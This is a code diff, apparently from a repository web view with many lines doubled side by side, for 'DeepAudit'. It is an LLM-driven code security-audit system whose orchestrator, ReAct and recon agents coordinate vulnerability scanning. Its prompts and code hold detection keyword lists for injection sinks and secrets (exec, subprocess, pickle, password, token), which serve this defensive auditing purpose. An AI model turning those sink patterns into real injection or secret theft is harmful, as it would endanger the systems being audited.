def register_sub_agent(self, name: str, agent: BaseAgent): def register_sub_agent(self, name: str, agent: BaseAgent):
"""注册子 Agent""" """注册子 Agent"""
self.sub_agents[name] = agent self.sub_agents[name] = agent
def cancel(self):
"""
取消执行 - 同时取消所有子 Agent
重写父类方法确保取消信号传播到所有子 Agent
"""
self._cancelled = True
logger.info(f"[{self.name}] Cancel requested, propagating to {len(self.sub_agents)} sub-agents")
# 🔥 传播取消信号到所有子 Agent
for name, agent in self.sub_agents.items():
if hasattr(agent, 'cancel'):
agent.cancel()
logger.info(f"[{self.name}] Cancelled sub-agent: {name}")
async def run(self, input_data: Dict[str, Any]) -> AgentResult: async def run(self, input_data: Dict[str, Any]) -> AgentResult:
""" """
执行编排任务 - LLM 全程参与 执行编排任务 - LLM 全程参与
@ -149,6 +179,8 @@ class OrchestratorAgent(BaseAgent):
input_data: { input_data: {
"project_info": 项目信息, "project_info": 项目信息,
"config": 审计配置, "config": 审计配置,
"project_root": 项目根目录,
"task_id": 任务ID,
} }
""" """
import time import time
@ -157,6 +189,14 @@ class OrchestratorAgent(BaseAgent):
project_info = input_data.get("project_info", {}) project_info = input_data.get("project_info", {})
config = input_data.get("config", {}) config = input_data.get("config", {})
# 🔥 保存运行时上下文,用于传递给子 Agent
self._runtime_context = {
"project_info": project_info,
"config": config,
"project_root": input_data.get("project_root", project_info.get("root", ".")),
"task_id": input_data.get("task_id"),
}
# 构建初始消息 # 构建初始消息
initial_message = self._build_initial_message(project_info, config) initial_message = self._build_initial_message(project_info, config)
@ -169,6 +209,7 @@ class OrchestratorAgent(BaseAgent):
self._steps = [] self._steps = []
self._all_findings = [] self._all_findings = []
final_result = None final_result = None
error_message = None # 🔥 跟踪错误信息
await self.emit_thinking("🧠 Orchestrator Agent 启动LLM 开始自主编排决策...") await self.emit_thinking("🧠 Orchestrator Agent 启动LLM 开始自主编排决策...")
@ -189,7 +230,7 @@ class OrchestratorAgent(BaseAgent):
llm_output, tokens_this_round = await self.stream_llm_call( llm_output, tokens_this_round = await self.stream_llm_call(
self._conversation_history, self._conversation_history,
temperature=0.1, temperature=0.1,
max_tokens=2048, max_tokens=4096, # 🔥 增加到 4096避免截断
) )
except asyncio.CancelledError: except asyncio.CancelledError:
logger.info(f"[{self.name}] LLM call cancelled") logger.info(f"[{self.name}] LLM call cancelled")
@ -197,11 +238,37 @@ class OrchestratorAgent(BaseAgent):
self._total_tokens += tokens_this_round self._total_tokens += tokens_this_round
# 🔥 检测空响应
if not llm_output or not llm_output.strip():
logger.warning(f"[{self.name}] Empty LLM response")
empty_retry_count = getattr(self, '_empty_retry_count', 0) + 1
self._empty_retry_count = empty_retry_count
if empty_retry_count >= 3:
logger.error(f"[{self.name}] Too many empty responses, stopping")
error_message = "连续收到空响应,停止编排"
await self.emit_event("error", error_message)
break
self._conversation_history.append({
"role": "user",
"content": "Received empty response. Please output Thought + Action + Action Input.",
})
continue
# 重置空响应计数器
self._empty_retry_count = 0
# 解析 LLM 的决策 # 解析 LLM 的决策
step = self._parse_llm_response(llm_output) step = self._parse_llm_response(llm_output)
if not step: if not step:
# LLM 输出格式不正确,提示重试 # LLM 输出格式不正确,提示重试
format_retry_count = getattr(self, '_format_retry_count', 0) + 1
self._format_retry_count = format_retry_count
if format_retry_count >= 3:
logger.error(f"[{self.name}] Too many format errors, stopping")
error_message = "连续格式错误,停止编排"
await self.emit_event("error", error_message)
break
await self.emit_llm_decision("格式错误", "需要重新输出") await self.emit_llm_decision("格式错误", "需要重新输出")
self._conversation_history.append({ self._conversation_history.append({
"role": "assistant", "role": "assistant",
@ -213,6 +280,9 @@ class OrchestratorAgent(BaseAgent):
}) })
continue continue
# 重置格式重试计数器
self._format_retry_count = 0
self._steps.append(step) self._steps.append(step)
# 🔥 发射 LLM 思考内容事件 - 展示编排决策的思考过程 # 🔥 发射 LLM 思考内容事件 - 展示编排决策的思考过程
@ -249,6 +319,11 @@ class OrchestratorAgent(BaseAgent):
observation = await self._dispatch_agent(step.action_input) observation = await self._dispatch_agent(step.action_input)
step.observation = observation step.observation = observation
# 🔥 子 Agent 执行完成后检查取消状态
if self.is_cancelled:
logger.info(f"[{self.name}] Cancelled after sub-agent dispatch")
break
# 🔥 发射观察事件 # 🔥 发射观察事件
await self.emit_llm_observation(observation) await self.emit_llm_observation(observation)
@ -272,6 +347,60 @@ class OrchestratorAgent(BaseAgent):
# 生成最终结果 # 生成最终结果
duration_ms = int((time.time() - start_time) * 1000) duration_ms = int((time.time() - start_time) * 1000)
# 🔥 如果被取消,返回取消结果
if self.is_cancelled:
await self.emit_event(
"info",
f"🛑 Orchestrator 已取消: {len(self._all_findings)} 个发现, {self._iteration} 轮决策"
)
return AgentResult(
success=False,
error="任务已取消",
data={
"findings": self._all_findings,
"steps": [
{
"thought": s.thought,
"action": s.action,
"action_input": s.action_input,
"observation": s.observation[:500] if s.observation else None,
}
for s in self._steps
],
},
iterations=self._iteration,
tool_calls=self._tool_calls,
tokens_used=self._total_tokens,
duration_ms=duration_ms,
)
# 🔥 如果有错误,返回失败结果
if error_message:
await self.emit_event(
"error",
f"❌ Orchestrator 失败: {error_message}"
)
return AgentResult(
success=False,
error=error_message,
data={
"findings": self._all_findings,
"steps": [
{
"thought": s.thought,
"action": s.action,
"action_input": s.action_input,
"observation": s.observation[:500] if s.observation else None,
}
for s in self._steps
],
},
iterations=self._iteration,
tool_calls=self._tool_calls,
tokens_used=self._total_tokens,
duration_ms=duration_ms,
)
await self.emit_event( await self.emit_event(
"info", "info",
f"🎯 Orchestrator 完成: {len(self._all_findings)} 个发现, {self._iteration} 轮决策" f"🎯 Orchestrator 完成: {len(self._all_findings)} 个发现, {self._iteration} 轮决策"
@ -377,6 +506,30 @@ class OrchestratorAgent(BaseAgent):
available = list(self.sub_agents.keys()) available = list(self.sub_agents.keys())
return f"错误: Agent '{agent_name}' 不存在。可用的 Agent: {available}" return f"错误: Agent '{agent_name}' 不存在。可用的 Agent: {available}"
# 🔥 检查是否重复调度同一个 Agent
dispatch_count = self._dispatched_tasks.get(agent_name, 0)
if dispatch_count >= 2:
return f"""## ⚠️ 重复调度警告
你已经调度 {agent_name} Agent {dispatch_count} 次了
如果之前的调度没有返回有用的结果请考虑
1. 尝试调度其他 Agent analysis verification
2. 使用 finish 操作结束审计并汇总已有发现
3. 提供更具体的任务描述
当前已收集的发现数量: {len(self._all_findings)}
"""
self._dispatched_tasks[agent_name] = dispatch_count + 1
# 🔥 设置父 Agent ID 并注册到注册表(动态 Agent 树)
logger.info(f"[Orchestrator] 准备调度 {agent_name} Agent, agent._registered={agent._registered}")
agent.set_parent_id(self._agent_id)
logger.info(f"[Orchestrator] 设置 parent_id 完成,准备注册 {agent_name}")
agent._register_to_registry(task=task)
logger.info(f"[Orchestrator] {agent_name} 注册完成agent._registered={agent._registered}")
await self.emit_event( await self.emit_event(
"dispatch", "dispatch",
f"📤 调度 {agent_name} Agent: {task[:100]}...", f"📤 调度 {agent_name} Agent: {task[:100]}...",
@ -387,30 +540,91 @@ class OrchestratorAgent(BaseAgent):
self._tool_calls += 1 self._tool_calls += 1
try: try:
# 构建子 Agent 输入 # 🔥 构建子 Agent 输入 - 传递完整的运行时上下文
project_info = self._runtime_context.get("project_info", {}).copy()
# 确保 project_info 包含 root 路径
if "root" not in project_info:
project_info["root"] = self._runtime_context.get("project_root", ".")
sub_input = { sub_input = {
"task": task, "task": task,
"task_context": context, "task_context": context,
"project_info": {}, # 从上下文获取 "project_info": project_info,
"config": {}, "config": self._runtime_context.get("config", {}),
"project_root": self._runtime_context.get("project_root", "."),
"previous_results": {
"findings": self._all_findings, # 传递已收集的发现
},
} }
# 🔥 执行子 Agent 前检查取消状态
if self.is_cancelled:
return f"## {agent_name} Agent 执行取消\n\n任务已被用户取消"
# 执行子 Agent # 执行子 Agent
result = await agent.run(sub_input) result = await agent.run(sub_input)
# 收集发现 # 🔥 执行后再次检查取消状态
if self.is_cancelled:
return f"## {agent_name} Agent 执行中断\n\n任务已被用户取消"
# 🔥 处理子 Agent 结果 - 不同 Agent 返回不同的数据结构
if result.success and result.data: if result.success and result.data:
findings = result.data.get("findings", []) data = result.data
self._all_findings.extend(findings)
# 🔥 收集发现 - 只收集格式正确的漏洞对象
# findings 字段通常来自 Analysis/Verification Agent是漏洞对象数组
# initial_findings 来自 Recon Agent可能是字符串数组观察或对象数组
findings = data.get("findings", [])
if findings:
# 只添加字典格式的发现
valid_findings = [f for f in findings if isinstance(f, dict)]
self._all_findings.extend(valid_findings)
await self.emit_event( await self.emit_event(
"dispatch_complete", "dispatch_complete",
f"{agent_name} Agent 完成: {len(findings)} 个发现", f"{agent_name} Agent 完成",
agent=agent_name, agent=agent_name,
findings_count=len(findings), findings_count=len(findings),
) )
# 构建观察结果 # 🔥 根据 Agent 类型构建不同的观察结果
if agent_name == "recon":
# Recon Agent 返回项目信息
observation = f"""## Recon Agent 执行结果
**状态**: 成功
**迭代次数**: {result.iterations}
**耗时**: {result.duration_ms}ms
### 项目结构
{json.dumps(data.get('project_structure', {}), ensure_ascii=False, indent=2)}
### 技术栈
- 语言: {data.get('tech_stack', {}).get('languages', [])}
- 框架: {data.get('tech_stack', {}).get('frameworks', [])}
- 数据库: {data.get('tech_stack', {}).get('databases', [])}
### 入口点 ({len(data.get('entry_points', []))} 个)
"""
for i, ep in enumerate(data.get('entry_points', [])[:10]):
if isinstance(ep, dict):
observation += f"{i+1}. [{ep.get('type', 'unknown')}] {ep.get('file', '')}:{ep.get('line', '')}\n"
observation += f"""
### 高风险区域
{data.get('high_risk_areas', [])}
### 初步发现 ({len(data.get('initial_findings', []))} 个)
"""
for finding in data.get('initial_findings', [])[:5]:
if isinstance(finding, str):
observation += f"- {finding}\n"
elif isinstance(finding, dict):
observation += f"- {finding.get('title', finding)}\n"
else:
# Analysis/Verification Agent 返回漏洞发现
observation = f"""## {agent_name} Agent 执行结果 observation = f"""## {agent_name} Agent 执行结果
**状态**: 成功 **状态**: 成功
@ -420,10 +634,9 @@ class OrchestratorAgent(BaseAgent):
### 发现摘要 ### 发现摘要
""" """
for i, f in enumerate(findings[:10]): # 最多显示 10 个 for i, f in enumerate(findings[:10]):
if not isinstance(f, dict): if not isinstance(f, dict):
continue continue
observation += f""" observation += f"""
{i+1}. [{f.get('severity', 'unknown')}] {f.get('title', 'Unknown')} {i+1}. [{f.get('severity', 'unknown')}] {f.get('title', 'Unknown')}
- 类型: {f.get('vulnerability_type', 'unknown')} - 类型: {f.get('vulnerability_type', 'unknown')}
@ -434,8 +647,8 @@ class OrchestratorAgent(BaseAgent):
if len(findings) > 10: if len(findings) > 10:
observation += f"\n... 还有 {len(findings) - 10} 个发现" observation += f"\n... 还有 {len(findings) - 10} 个发现"
if result.data.get("summary"): if data.get("summary"):
observation += f"\n\n### Agent 总结\n{result.data['summary']}" observation += f"\n\n### Agent 总结\n{data['summary']}"
return observation return observation
else: else:

View File

@ -1,380 +0,0 @@
"""
真正的 ReAct Agent 实现
LLM 是大脑全程参与决策
ReAct 循环:
1. Thought: LLM 思考当前状态和下一步
2. Action: LLM 决定调用哪个工具
3. Observation: 执行工具获取结果
4. 重复直到 LLM 决定完成
"""
import json
import logging
import re
from typing import List, Dict, Any, Optional, Tuple
from dataclasses import dataclass
from .base import BaseAgent, AgentConfig, AgentResult, AgentType, AgentPattern
from ..json_parser import AgentJsonParser
logger = logging.getLogger(__name__)
REACT_SYSTEM_PROMPT = """你是 DeepAudit 安全审计 Agent一个专业的代码安全分析专家。
## 你的任务
对目标项目进行全面的安全审计发现潜在的安全漏洞
## 你的工具
{tools_description}
## 工作方式
你需要通过 **思考-行动-观察** 循环来完成任务
1. **Thought**: 分析当前情况思考下一步应该做什么
2. **Action**: 选择一个工具并执行
3. **Observation**: 观察工具返回的结果
4. 重复上述过程直到你认为审计完成
## 输出格式
每一步必须严格按照以下格式输出
```
Thought: [你的思考过程分析当前状态决定下一步]
Action: [工具名称]
Action Input: [工具参数JSON 格式]
```
当你完成分析后输出
```
Thought: [总结分析结果]
Final Answer: [JSON 格式的最终发现]
```
## Final Answer 格式
```json
{{
"findings": [
{{
"vulnerability_type": "sql_injection",
"severity": "high",
"title": "SQL 注入漏洞",
"description": "详细描述",
"file_path": "path/to/file.py",
"line_start": 42,
"code_snippet": "危险代码片段",
"suggestion": "修复建议"
}}
],
"summary": "审计总结"
}}
```
## 审计策略建议
1. 先用 list_files 了解项目结构
2. 识别关键文件路由控制器数据库操作
3. 使用 search_code 搜索危险模式eval, exec, query, innerHTML
4. 读取可疑文件进行深度分析
5. 如果有 semgrep用它进行全面扫描
## 重点关注的漏洞类型
- SQL 注入 (query, execute, raw SQL)
- XSS (innerHTML, document.write, v-html)
- 命令注入 (exec, system, subprocess, child_process)
- 路径遍历 (open, readFile, path concatenation)
- SSRF (requests, fetch, http client)
- 硬编码密钥 (password, secret, api_key, token)
- 不安全的反序列化 (pickle, yaml.load, eval)
现在开始审计"""
@dataclass
class AgentStep:
"""Agent 执行步骤"""
thought: str
action: Optional[str] = None
action_input: Optional[Dict] = None
observation: Optional[str] = None
is_final: bool = False
final_answer: Optional[Dict] = None
class ReActAgent(BaseAgent):
"""
真正的 ReAct Agent
LLM 全程参与决策自主选择工具和分析策略
"""
def __init__(
self,
llm_service,
tools: Dict[str, Any],
event_emitter=None,
agent_type: AgentType = AgentType.ANALYSIS,
max_iterations: int = 30,
):
config = AgentConfig(
name="ReActAgent",
agent_type=agent_type,
pattern=AgentPattern.REACT,
max_iterations=max_iterations,
system_prompt=REACT_SYSTEM_PROMPT,
)
super().__init__(config, llm_service, tools, event_emitter)
self._conversation_history: List[Dict[str, str]] = []
self._steps: List[AgentStep] = []
def _get_tools_description(self) -> str:
"""生成工具描述"""
descriptions = []
for name, tool in self.tools.items():
if name.startswith("_"):
continue
desc = f"### {name}\n"
desc += f"{tool.description}\n"
# 添加参数说明
if hasattr(tool, 'args_schema') and tool.args_schema:
schema = tool.args_schema.schema()
properties = schema.get("properties", {})
if properties:
desc += "参数:\n"
for param_name, param_info in properties.items():
param_desc = param_info.get("description", "")
param_type = param_info.get("type", "string")
desc += f" - {param_name} ({param_type}): {param_desc}\n"
descriptions.append(desc)
return "\n".join(descriptions)
def _build_system_prompt(self, project_info: Dict, task_context: str = "") -> str:
"""构建系统提示词"""
tools_desc = self._get_tools_description()
prompt = self.config.system_prompt.format(tools_description=tools_desc)
if project_info:
prompt += f"\n\n## 项目信息\n"
prompt += f"- 名称: {project_info.get('name', 'unknown')}\n"
prompt += f"- 语言: {', '.join(project_info.get('languages', ['unknown']))}\n"
prompt += f"- 文件数: {project_info.get('file_count', 'unknown')}\n"
if task_context:
prompt += f"\n\n## 任务上下文\n{task_context}"
return prompt
def _parse_llm_response(self, response: str) -> AgentStep:
"""解析 LLM 响应"""
step = AgentStep(thought="")
# 提取 Thought
thought_match = re.search(r'Thought:\s*(.*?)(?=Action:|Final Answer:|$)', response, re.DOTALL)
if thought_match:
step.thought = thought_match.group(1).strip()
# 检查是否是最终答案
final_match = re.search(r'Final Answer:\s*(.*?)$', response, re.DOTALL)
if final_match:
step.is_final = True
answer_text = final_match.group(1).strip()
answer_text = re.sub(r'```json\s*', '', answer_text)
answer_text = re.sub(r'```\s*', '', answer_text)
# 使用增强的 JSON 解析器
step.final_answer = AgentJsonParser.parse(
answer_text,
default={"raw_answer": answer_text}
)
# 确保 findings 格式正确
if "findings" in step.final_answer:
step.final_answer["findings"] = [
f for f in step.final_answer["findings"]
if isinstance(f, dict)
]
return step
# 提取 Action
action_match = re.search(r'Action:\s*(\w+)', response)
if action_match:
step.action = action_match.group(1).strip()
# 提取 Action Input
input_match = re.search(r'Action Input:\s*(.*?)(?=Thought:|Action:|Observation:|$)', response, re.DOTALL)
if input_match:
input_text = input_match.group(1).strip()
input_text = re.sub(r'```json\s*', '', input_text)
input_text = re.sub(r'```\s*', '', input_text)
# 使用增强的 JSON 解析器
step.action_input = AgentJsonParser.parse(
input_text,
default={"raw_input": input_text}
)
return step
async def _execute_tool(self, tool_name: str, tool_input: Dict) -> str:
"""执行工具"""
tool = self.tools.get(tool_name)
if not tool:
return f"错误: 工具 '{tool_name}' 不存在。可用工具: {list(self.tools.keys())}"
try:
self._tool_calls += 1
await self.emit_tool_call(tool_name, tool_input)
import time
start = time.time()
result = await tool.execute(**tool_input)
duration_ms = int((time.time() - start) * 1000)
await self.emit_tool_result(tool_name, str(result.data)[:200], duration_ms)
if result.success:
# 截断过长的输出
output = str(result.data)
if len(output) > 4000:
output = output[:4000] + "\n\n... [输出已截断,共 {} 字符]".format(len(str(result.data)))
return output
else:
return f"工具执行失败: {result.error}"
except Exception as e:
logger.error(f"Tool execution error: {e}")
return f"工具执行错误: {str(e)}"
async def run(self, input_data: Dict[str, Any]) -> AgentResult:
"""
执行 ReAct Agent
LLM 全程参与自主决策
"""
import time
start_time = time.time()
project_info = input_data.get("project_info", {})
task_context = input_data.get("task_context", "")
config = input_data.get("config", {})
# 构建系统提示词
system_prompt = self._build_system_prompt(project_info, task_context)
# 初始化对话历史
self._conversation_history = [
{"role": "system", "content": system_prompt},
{"role": "user", "content": "请开始对项目进行安全审计。首先了解项目结构,然后系统性地搜索和分析潜在的安全漏洞。"},
]
self._steps = []
all_findings = []
await self.emit_thinking("🤖 ReAct Agent 启动LLM 开始自主分析...")
try:
for iteration in range(self.config.max_iterations):
if self.is_cancelled:
break
self._iteration = iteration + 1
await self.emit_thinking(f"💭 第 {iteration + 1} 轮思考...")
# 🔥 调用 LLM 进行思考和决策
response = await self.llm_service.chat_completion_raw(
messages=self._conversation_history,
temperature=0.1,
max_tokens=2048,
)
llm_output = response.get("content", "")
self._total_tokens += response.get("usage", {}).get("total_tokens", 0)
# 发射思考事件
await self.emit_event("thinking", f"LLM: {llm_output[:500]}...")
# 解析 LLM 响应
step = self._parse_llm_response(llm_output)
self._steps.append(step)
# 添加 LLM 响应到历史
self._conversation_history.append({
"role": "assistant",
"content": llm_output,
})
# 检查是否完成
if step.is_final:
await self.emit_thinking("✅ LLM 完成分析,生成最终报告")
if step.final_answer and "findings" in step.final_answer:
all_findings = step.final_answer["findings"]
break
# 执行工具
if step.action:
await self.emit_thinking(f"🔧 LLM 决定调用工具: {step.action}")
observation = await self._execute_tool(
step.action,
step.action_input or {}
)
step.observation = observation
# 添加观察结果到历史
self._conversation_history.append({
"role": "user",
"content": f"Observation: {observation}",
})
else:
# LLM 没有选择工具,提示它继续
self._conversation_history.append({
"role": "user",
"content": "请继续分析,选择一个工具执行,或者如果分析完成,输出 Final Answer。",
})
duration_ms = int((time.time() - start_time) * 1000)
await self.emit_event(
"info",
f"🎯 ReAct Agent 完成: {len(all_findings)} 个发现, {self._iteration} 轮迭代, {self._tool_calls} 次工具调用"
)
return AgentResult(
success=True,
data={
"findings": all_findings,
"steps": [
{
"thought": s.thought,
"action": s.action,
"action_input": s.action_input,
"observation": s.observation[:500] if s.observation else None,
}
for s in self._steps
],
},
iterations=self._iteration,
tool_calls=self._tool_calls,
tokens_used=self._total_tokens,
duration_ms=duration_ms,
)
except Exception as e:
logger.error(f"ReAct Agent failed: {e}", exc_info=True)
return AgentResult(success=False, error=str(e))
def get_conversation_history(self) -> List[Dict[str, str]]:
"""获取对话历史"""
return self._conversation_history
def get_steps(self) -> List[AgentStep]:
"""获取执行步骤"""
return self._steps

View File

@ -99,6 +99,12 @@ Final Answer: [JSON 格式的收集结果]
4. 运行安全扫描发现初步问题 4. 运行安全扫描发现初步问题
5. 根据发现继续深入 5. 根据发现继续深入
## 重要提示
- 用户可能指定了特定的目标文件进行审计
- 如果 list_files 显示"审计范围限定为 X 个指定文件"说明只需要分析这些文件
- 在这种情况下直接读取和分析指定的文件不要浪费时间遍历其他目录
- 如果目录显示为空可能是因为该目录不包含目标文件
## 重要原则 ## 重要原则
1. **你是大脑** - 每一步都要思考不要机械执行 1. **你是大脑** - 每一步都要思考不要机械执行
2. **动态调整** - 根据发现调整策略 2. **动态调整** - 根据发现调整策略
@ -216,13 +222,38 @@ class ReconAgent(BaseAgent):
task = input_data.get("task", "") task = input_data.get("task", "")
task_context = input_data.get("task_context", "") task_context = input_data.get("task_context", "")
# 🔥 获取目标文件列表
target_files = config.get("target_files", [])
exclude_patterns = config.get("exclude_patterns", [])
# 构建初始消息 # 构建初始消息
initial_message = f"""请开始收集项目信息。 initial_message = f"""请开始收集项目信息。
## 项目基本信息 ## 项目基本信息
- 名称: {project_info.get('name', 'unknown')} - 名称: {project_info.get('name', 'unknown')}
- 根目录: {project_info.get('root', '.')} - 根目录: {project_info.get('root', '.')}
- 文件数量: {project_info.get('file_count', 'unknown')}
## 审计范围
"""
# 🔥 如果指定了目标文件,明确告知 Agent
if target_files:
initial_message += f"""⚠️ **重要**: 用户指定了 {len(target_files)} 个目标文件进行审计:
"""
for tf in target_files[:10]:
initial_message += f"- {tf}\n"
if len(target_files) > 10:
initial_message += f"- ... 还有 {len(target_files) - 10} 个文件\n"
initial_message += """
请直接读取和分析这些指定的文件不要浪费时间遍历其他目录
"""
else:
initial_message += "全项目审计(无特定文件限制)\n"
if exclude_patterns:
initial_message += f"\n排除模式: {', '.join(exclude_patterns[:5])}\n"
initial_message += f"""
## 任务上下文 ## 任务上下文
{task_context or task or '进行全面的信息收集,为安全审计做准备。'} {task_context or task or '进行全面的信息收集,为安全审计做准备。'}
@ -239,6 +270,7 @@ class ReconAgent(BaseAgent):
self._steps = [] self._steps = []
final_result = None final_result = None
error_message = None # 🔥 跟踪错误信息
await self.emit_thinking("Recon Agent 启动LLM 开始自主收集信息...") await self.emit_thinking("Recon Agent 启动LLM 开始自主收集信息...")
@ -259,7 +291,7 @@ class ReconAgent(BaseAgent):
llm_output, tokens_this_round = await self.stream_llm_call( llm_output, tokens_this_round = await self.stream_llm_call(
self._conversation_history, self._conversation_history,
temperature=0.1, temperature=0.1,
max_tokens=2048, max_tokens=4096, # 🔥 增加到 4096避免截断
) )
except asyncio.CancelledError: except asyncio.CancelledError:
logger.info(f"[{self.name}] LLM call cancelled") logger.info(f"[{self.name}] LLM call cancelled")
@ -270,13 +302,22 @@ class ReconAgent(BaseAgent):
# 🔥 Handle empty LLM response to prevent loops # 🔥 Handle empty LLM response to prevent loops
if not llm_output or not llm_output.strip(): if not llm_output or not llm_output.strip():
logger.warning(f"[{self.name}] Empty LLM response in iteration {self._iteration}") logger.warning(f"[{self.name}] Empty LLM response in iteration {self._iteration}")
await self.emit_llm_decision("收到空响应", "LLM 返回内容为空,尝试重试通过提示") empty_retry_count = getattr(self, '_empty_retry_count', 0) + 1
self._empty_retry_count = empty_retry_count
if empty_retry_count >= 3:
logger.error(f"[{self.name}] Too many empty responses, stopping")
error_message = "连续收到空响应,停止信息收集"
await self.emit_event("error", error_message)
break
self._conversation_history.append({ self._conversation_history.append({
"role": "user", "role": "user",
"content": "Received empty response. Please output your Thought and Action.", "content": "Received empty response. Please output your Thought and Action.",
}) })
continue continue
# 重置空响应计数器
self._empty_retry_count = 0
# 解析 LLM 响应 # 解析 LLM 响应
step = self._parse_llm_response(llm_output) step = self._parse_llm_response(llm_output)
self._steps.append(step) self._steps.append(step)
@ -311,6 +352,11 @@ class ReconAgent(BaseAgent):
step.action_input or {} step.action_input or {}
) )
# 🔥 工具执行后检查取消状态
if self.is_cancelled:
logger.info(f"[{self.name}] Cancelled after tool execution")
break
step.observation = observation step.observation = observation
# 🔥 发射 LLM 观察事件 # 🔥 发射 LLM 观察事件
@ -329,9 +375,84 @@ class ReconAgent(BaseAgent):
"content": "请继续,选择一个工具执行,或者如果信息收集完成,输出 Final Answer。", "content": "请继续,选择一个工具执行,或者如果信息收集完成,输出 Final Answer。",
}) })
# 🔥 如果循环结束但没有 final_result强制 LLM 总结
if not final_result and not self.is_cancelled and not error_message:
await self.emit_thinking("📝 信息收集阶段结束,正在生成总结...")
# 添加强制总结的提示
self._conversation_history.append({
"role": "user",
"content": """信息收集阶段已结束。请立即输出 Final Answer总结你收集到的所有信息。
请按以下 JSON 格式输出
```json
{
"project_structure": {"directories": [...], "key_files": [...]},
"tech_stack": {"languages": [...], "frameworks": [...], "databases": [...]},
"entry_points": [{"type": "...", "file": "...", "description": "..."}],
"high_risk_areas": ["file1.py", "file2.js"],
"initial_findings": [{"title": "...", "description": "...", "file_path": "..."}],
"summary": "项目总结描述"
}
```
Final Answer:""",
})
try:
summary_output, _ = await self.stream_llm_call(
self._conversation_history,
temperature=0.1,
max_tokens=2048,
)
if summary_output and summary_output.strip():
# 解析总结输出
summary_text = summary_output.strip()
summary_text = re.sub(r'```json\s*', '', summary_text)
summary_text = re.sub(r'```\s*', '', summary_text)
final_result = AgentJsonParser.parse(
summary_text,
default=self._summarize_from_steps()
)
except Exception as e:
logger.warning(f"[{self.name}] Failed to generate summary: {e}")
# 处理结果 # 处理结果
duration_ms = int((time.time() - start_time) * 1000) duration_ms = int((time.time() - start_time) * 1000)
# 🔥 如果被取消,返回取消结果
if self.is_cancelled:
await self.emit_event(
"info",
f"🛑 Recon Agent 已取消: {self._iteration} 轮迭代"
)
return AgentResult(
success=False,
error="任务已取消",
data=self._summarize_from_steps(),
iterations=self._iteration,
tool_calls=self._tool_calls,
tokens_used=self._total_tokens,
duration_ms=duration_ms,
)
# 🔥 如果有错误,返回失败结果
if error_message:
await self.emit_event(
"error",
f"❌ Recon Agent 失败: {error_message}"
)
return AgentResult(
success=False,
error=error_message,
data=self._summarize_from_steps(),
iterations=self._iteration,
tool_calls=self._tool_calls,
tokens_used=self._total_tokens,
duration_ms=duration_ms,
)
# 如果没有最终结果,从历史中汇总 # 如果没有最终结果,从历史中汇总
if not final_result: if not final_result:
final_result = self._summarize_from_steps() final_result = self._summarize_from_steps()
@ -364,7 +485,7 @@ class ReconAgent(BaseAgent):
return AgentResult(success=False, error=str(e)) return AgentResult(success=False, error=str(e))
def _summarize_from_steps(self) -> Dict[str, Any]: def _summarize_from_steps(self) -> Dict[str, Any]:
"""从步骤中汇总结果""" """从步骤中汇总结果 - 增强版,从 LLM 思考过程中提取更多信息"""
# 默认结果结构 # 默认结果结构
result = { result = {
"project_structure": {}, "project_structure": {},
@ -377,34 +498,90 @@ class ReconAgent(BaseAgent):
"high_risk_areas": [], "high_risk_areas": [],
"dependencies": {}, "dependencies": {},
"initial_findings": [], "initial_findings": [],
"summary": "", # 🔥 新增:汇总 LLM 的思考
} }
# 从步骤的观察结果中提取信息 # 🔥 收集所有 LLM 的思考内容
thoughts = []
# 从步骤的观察结果和思考中提取信息
for step in self._steps: for step in self._steps:
# 收集思考内容
if step.thought:
thoughts.append(step.thought)
if step.observation: if step.observation:
# 尝试从观察中识别技术栈等信息 # 尝试从观察中识别技术栈等信息
obs_lower = step.observation.lower() obs_lower = step.observation.lower()
if "package.json" in obs_lower: # 识别语言
if "package.json" in obs_lower or ".js" in obs_lower or ".ts" in obs_lower:
result["tech_stack"]["languages"].append("JavaScript/TypeScript") result["tech_stack"]["languages"].append("JavaScript/TypeScript")
if "requirements.txt" in obs_lower or "setup.py" in obs_lower: if "requirements.txt" in obs_lower or "setup.py" in obs_lower or ".py" in obs_lower:
result["tech_stack"]["languages"].append("Python") result["tech_stack"]["languages"].append("Python")
if "go.mod" in obs_lower: if "go.mod" in obs_lower or ".go" in obs_lower:
result["tech_stack"]["languages"].append("Go") result["tech_stack"]["languages"].append("Go")
if "pom.xml" in obs_lower or ".java" in obs_lower:
result["tech_stack"]["languages"].append("Java")
if ".php" in obs_lower:
result["tech_stack"]["languages"].append("PHP")
if ".rb" in obs_lower or "gemfile" in obs_lower:
result["tech_stack"]["languages"].append("Ruby")
# 识别框架 # 识别框架
if "react" in obs_lower: if "react" in obs_lower:
result["tech_stack"]["frameworks"].append("React") result["tech_stack"]["frameworks"].append("React")
if "vue" in obs_lower:
result["tech_stack"]["frameworks"].append("Vue")
if "angular" in obs_lower:
result["tech_stack"]["frameworks"].append("Angular")
if "django" in obs_lower: if "django" in obs_lower:
result["tech_stack"]["frameworks"].append("Django") result["tech_stack"]["frameworks"].append("Django")
if "flask" in obs_lower:
result["tech_stack"]["frameworks"].append("Flask")
if "fastapi" in obs_lower: if "fastapi" in obs_lower:
result["tech_stack"]["frameworks"].append("FastAPI") result["tech_stack"]["frameworks"].append("FastAPI")
if "express" in obs_lower: if "express" in obs_lower:
result["tech_stack"]["frameworks"].append("Express") result["tech_stack"]["frameworks"].append("Express")
if "spring" in obs_lower:
result["tech_stack"]["frameworks"].append("Spring")
if "streamlit" in obs_lower:
result["tech_stack"]["frameworks"].append("Streamlit")
# 识别数据库
if "mysql" in obs_lower or "pymysql" in obs_lower:
result["tech_stack"]["databases"].append("MySQL")
if "postgres" in obs_lower or "asyncpg" in obs_lower:
result["tech_stack"]["databases"].append("PostgreSQL")
if "mongodb" in obs_lower or "pymongo" in obs_lower:
result["tech_stack"]["databases"].append("MongoDB")
if "redis" in obs_lower:
result["tech_stack"]["databases"].append("Redis")
if "sqlite" in obs_lower:
result["tech_stack"]["databases"].append("SQLite")
# 🔥 识别高风险区域(从观察中提取)
risk_keywords = ["api", "auth", "login", "password", "secret", "key", "token",
"admin", "upload", "download", "exec", "eval", "sql", "query"]
for keyword in risk_keywords:
if keyword in obs_lower:
# 尝试从观察中提取文件路径
import re
file_matches = re.findall(r'[\w/]+\.(?:py|js|ts|java|php|go|rb)', step.observation)
for file_path in file_matches[:3]: # 限制数量
if file_path not in result["high_risk_areas"]:
result["high_risk_areas"].append(file_path)
# 去重 # 去重
result["tech_stack"]["languages"] = list(set(result["tech_stack"]["languages"])) result["tech_stack"]["languages"] = list(set(result["tech_stack"]["languages"]))
